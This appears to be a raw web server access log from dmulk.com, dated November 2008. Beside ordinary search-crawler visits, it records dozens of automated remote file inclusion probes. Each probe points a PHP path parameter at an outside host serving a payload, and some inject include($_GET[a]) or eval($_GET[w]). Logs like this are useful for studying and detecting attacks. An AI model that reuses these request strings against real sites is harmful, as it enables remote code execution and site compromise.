194.170.60.110 - - [04/Nov/2008:08:46:27 -0800] "GET /phpshop/index.php?base_dir=http://www.natuurenwetenschap.be/banners/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.170.60.110 - - [04/Nov/2008:08:46:27 -0800] "GET /logs//phpshop/index.php?base_dir=http://www.natuurenwetenschap.be/banners/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
59.126.46.141 - - [04/Nov/2008:08:47:07 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.dsfashion.nl/resources/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [04/Nov/2008:08:47:08 -0800] "GET /phphtml.php?htmlclass_path=http://www.dsfashion.nl/resources/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.16.18 - - [04/Nov/2008:08:47:15 -0800] "GET /logs/access_080714.log/index.php?option=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:47:26 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 200 94730 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.38.231 - - [04/Nov/2008:08:47:29 -0800] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.38.231 - - [04/Nov/2008:08:47:29 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.38.231 - - [04/Nov/2008:08:47:29 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
209.85.108.8 - - [04/Nov/2008:08:47:32 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.108.8 - - [04/Nov/2008:08:47:32 -0800] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.108.8 - - [04/Nov/2008:08:47:33 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 200 3711 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.67.57 - - [04/Nov/2008:08:47:34 -0800] "GET /blog/index.php/2008/04/ HTTP/1.1" 200 13666 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
83.2.108.2 - - [04/Nov/2008:08:47:52 -0800] "GET /include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
83.2.108.2 - - [04/Nov/2008:08:47:52 -0800] "GET /logs/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
64.38.12.82 - - [04/Nov/2008:08:48:00 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://billing.webcity.co.uk/~date/cc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.38.12.82 - - [04/Nov/2008:08:48:00 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://billing.webcity.co.uk/~date/cc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.38.12.82 - - [04/Nov/2008:08:48:00 -0800] "GET /index.php?DOCUMENT_ROOT=http://billing.webcity.co.uk/~date/cc/id.txt???? HTTP/1.1" 200 94840 "-" "libwww-perl/5.813" "www.dmulk.com"
64.38.12.82 - - [04/Nov/2008:08:48:01 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://billing.webcity.co.uk/~date/cc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:08:48:04 -0800] "GET /bikes/dteel/EQ2/?D=A HTTP/1.0" 200 971 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.38.12.204 - - [04/Nov/2008:08:48:23 -0800] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [04/Nov/2008:08:48:23 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [04/Nov/2008:08:48:23 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.50.221.108 - - [04/Nov/2008:08:48:25 -0800] "GET /include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
61.50.221.108 - - [04/Nov/2008:08:48:25 -0800] "GET /logs/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://excelent.do.am/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
209.85.108.8 - - [04/Nov/2008:08:48:31 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:48:36 -0800] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:48:36 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:48:36 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:49:04 -0800] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:49:04 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:49:04 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.21.107 - - [04/Nov/2008:08:49:26 -0800] "GET /logs/access_080629.log/config.php?rootBase=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.0.240 - - [04/Nov/2008:08:49:50 -0800] "GET /index.php?contenido=http://www.parcornithologique.com//forum/forums/12-cmd.txt? HTTP/1.1" 200 94863 "-" "libwww-perl/5.76" "www.dmulk.com"
80.67.21.107 - - [04/Nov/2008:08:49:56 -0800] "GET /logs/access_080309.log/config.php?rootBase=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.21.107 - - [04/Nov/2008:08:49:56 -0800] "GET /config.php?rootBase=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.21.107 - - [04/Nov/2008:08:49:56 -0800] "GET /logs/access_080525.log/config.php?rootBase=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.21.107 - - [04/Nov/2008:08:49:56 -0800] "GET /logs/config.php?rootBase=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:50:01 -0800] "GET /logs/access_080810.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:50:01 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:50:01 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:50:21 -0800] "GET /logs/access_080829.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.57 - - [04/Nov/2008:08:50:30 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.67.57 - - [04/Nov/2008:08:50:31 -0800] "GET /?show=slide&pageid=169&nggpage=2 HTTP/1.1" 200 157712 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:50:34 -0800] "GET /logs/access_081008.log//index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:50:35 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 200 94714 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:50:36 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:08:50:50 -0800] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://www.annunciora.it/images/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:08:50:50 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.annunciora.it/images/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:08:50:50 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.annunciora.it/images/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
194.170.60.110 - - [04/Nov/2008:08:51:11 -0800] "GET /logs/access_080811.log//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://www.natuurenwetenschap.be/banners/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.170.60.110 - - [04/Nov/2008:08:51:11 -0800] "GET /administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://www.natuurenwetenschap.be/banners/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.170.60.110 - - [04/Nov/2008:08:51:12 -0800] "GET /logs//administrator/components/com_virtuemart/virtuemart.cfg.php?mosConfig_absolute_path=http://www.natuurenwetenschap.be/banners/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.249.67.57 - - [04/Nov/2008:08:51:26 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-079_0.jpg HTTP/1.1" 200 373108 "-" "Googlebot-Image/1.0" "dmulk.com"
121.124.127.40 - - [04/Nov/2008:08:51:30 -0800] "GET /logs/access_071220.log/errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [04/Nov/2008:08:51:31 -0800] "GET /errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [04/Nov/2008:08:51:31 -0800] "GET /logs/errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [04/Nov/2008:08:51:44 -0800] "GET /logs/access_071220.log/errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [04/Nov/2008:08:51:44 -0800] "GET /errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.124.127.40 - - [04/Nov/2008:08:51:45 -0800] "GET /logs/errors.php?error=http://www.pdca.pl//components/com_yanc/images/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.84.183.38 - - [04/Nov/2008:08:52:09 -0800] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.84.183.38 - - [04/Nov/2008:08:52:10 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.84.183.38 - - [04/Nov/2008:08:52:10 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.48.153.200 - - [04/Nov/2008:08:52:13 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.67.57 - - [04/Nov/2008:08:52:47 -0800] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/?show=gallery HTTP/1.1" 200 25941 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
83.222.4.51 - - [04/Nov/2008:08:53:34 -0800] "GET /logs/access_080727.log/index.php?p=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.222.4.51 - - [04/Nov/2008:08:53:35 -0800] "GET /index.php?p=http://www.geocities.com/testerscan/id?? HTTP/1.1" 200 94660 "-" "libwww-perl/5.803" "www.dmulk.com"
83.222.4.51 - - [04/Nov/2008:08:53:37 -0800] "GET /logs/index.php?p=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.174.68.56 - - [04/Nov/2008:08:53:47 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.67.57 - - [04/Nov/2008:08:54:23 -0800] "GET /blog/index.php/2008/08/ HTTP/1.1" 200 77121 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
82.78.216.197 - - [04/Nov/2008:08:55:08 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://upfcorp.com/components/.bash/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:08:55:08 -0800] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://upfcorp.com/components/.bash/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.78.216.197 - - [04/Nov/2008:08:55:08 -0800] "GET /logs/access_080722.log%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://upfcorp.com/components/.bash/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.249.67.57 - - [04/Nov/2008:08:55:12 -0800] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=0 HTTP/1.1" 200 211614 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
66.249.67.57 - - [04/Nov/2008:08:55:12 -0800] "GET /blog/index.php/2008/08/18/dan-mulkiewicz-for-president/ HTTP/1.1" 200 7120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
83.222.4.51 - - [04/Nov/2008:08:55:21 -0800] "GET /logs/access_080726.log/index.php?p=http://www.geocities.com/testerscan/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.85.108.8 - - [04/Nov/2008:08:56:40 -0800] "GET /logs/access_080427.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.108.8 - - [04/Nov/2008:08:56:40 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.108.8 - - [04/Nov/2008:08:56:50 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.108.8 - - [04/Nov/2008:08:56:50 -0800] "GET /logs/access_080621.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.114.112.155 - - [04/Nov/2008:08:56:51 -0800] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);classhttp://not-network.com/idscan8.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.114.112.155 - - [04/Nov/2008:08:56:51 -0800] "GET /logs/access_080826.log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);classhttp://not-network.com/idscan8.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.114.112.155 - - [04/Nov/2008:08:56:51 -0800] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);classhttp://not-network.com/idscan8.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.114.112.155 - - [04/Nov/2008:08:56:52 -0800] "GET /logs/access_080905.log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);classhttp://not-network.com/idscan8.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:08:57:46 -0800] "GET /logs/access_080309.log%20/config.php?rootBase=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:08:57:46 -0800] "GET /config.php?rootBase=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:08:57:46 -0800] "GET /logs/access_080309.log/config.php?rootBase=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:08:57:46 -0800] "GET /logs/access_080525.log/config.php?rootBase=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:08:57:49 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://qweqwe123.hostinggratisargentina.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:08:57:49 -0800] "GET /logs/access_080218.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://qweqwe123.hostinggratisargentina.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:08:57:49 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://qweqwe123.hostinggratisargentina.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:08:57:50 -0800] "GET /logs/access_080309.log/config.php?rootBase=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:08:57:50 -0800] "GET /logs/config.php?rootBase=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:08:57:50 -0800] "GET /config.php?rootBase=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:08:57:51 -0800] "GET /logs/config.php?rootBase=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:08:57:52 -0800] "GET /logs/access_080309.log%20/config.php?rootBase=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:08:57:54 -0800] "GET /logs/access_080212.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://qweqwe123.hostinggratisargentina.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:08:57:55 -0800] "GET /logs/access_080525.log/config.php?rootBase=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.0.240 - - [04/Nov/2008:08:58:30 -0800] "GET /logs/access_080929.log/index.php?contenido=http://www.parcornithologique.com//forum/forums/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.0.240 - - [04/Nov/2008:08:58:31 -0800] "GET /logs/index.php?contenido=http://www.parcornithologique.com//forum/forums/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:08:58:36 -0800] "GET /logs/access_080309.log%20/config.php?rootBase=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:08:58:36 -0800] "GET /config.php?rootBase=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:08:58:36 -0800] "GET /logs/config.php?rootBase=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.98.1.156 - - [04/Nov/2008:08:58:45 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://qweqwe123.hostinggratisargentina.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.98.1.156 - - [04/Nov/2008:08:58:45 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://qweqwe123.hostinggratisargentina.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.98.1.156 - - [04/Nov/2008:08:58:45 -0800] "GET /logs/access_080212.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://qweqwe123.hostinggratisargentina.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:08:58:59 -0800] "GET /logs/access_080309.log/config.php?rootBase=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.10.118 - - [04/Nov/2008:08:58:59 -0800] "GET /logs/access_080525.log/config.php?rootBase=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.98.1.156 - - [04/Nov/2008:08:59:21 -0800] "GET /logs/access_080119.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://qweqwe123.hostinggratisargentina.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:59:30 -0800] "GET /logs/access_080228.log/errors.php?error=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:59:30 -0800] "GET /errors.php?error=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:59:30 -0800] "GET /logs/errors.php?error=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:59:32 -0800] "GET /logs/access_080908.log//index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.71.162 - - [04/Nov/2008:08:59:39 -0800] "GET /logs/access_080311.log//components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.71.162 - - [04/Nov/2008:08:59:39 -0800] "GET /components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.71.162 - - [04/Nov/2008:08:59:40 -0800] "GET /logs//components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.71.162 - - [04/Nov/2008:08:59:41 -0800] "GET /logs/access_080810.log//components/com_jombib/jombib.php?mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.13.217.217 - - [04/Nov/2008:08:59:47 -0800] "GET /logs/access_081007.log/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.geocities.com/scannersspreads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
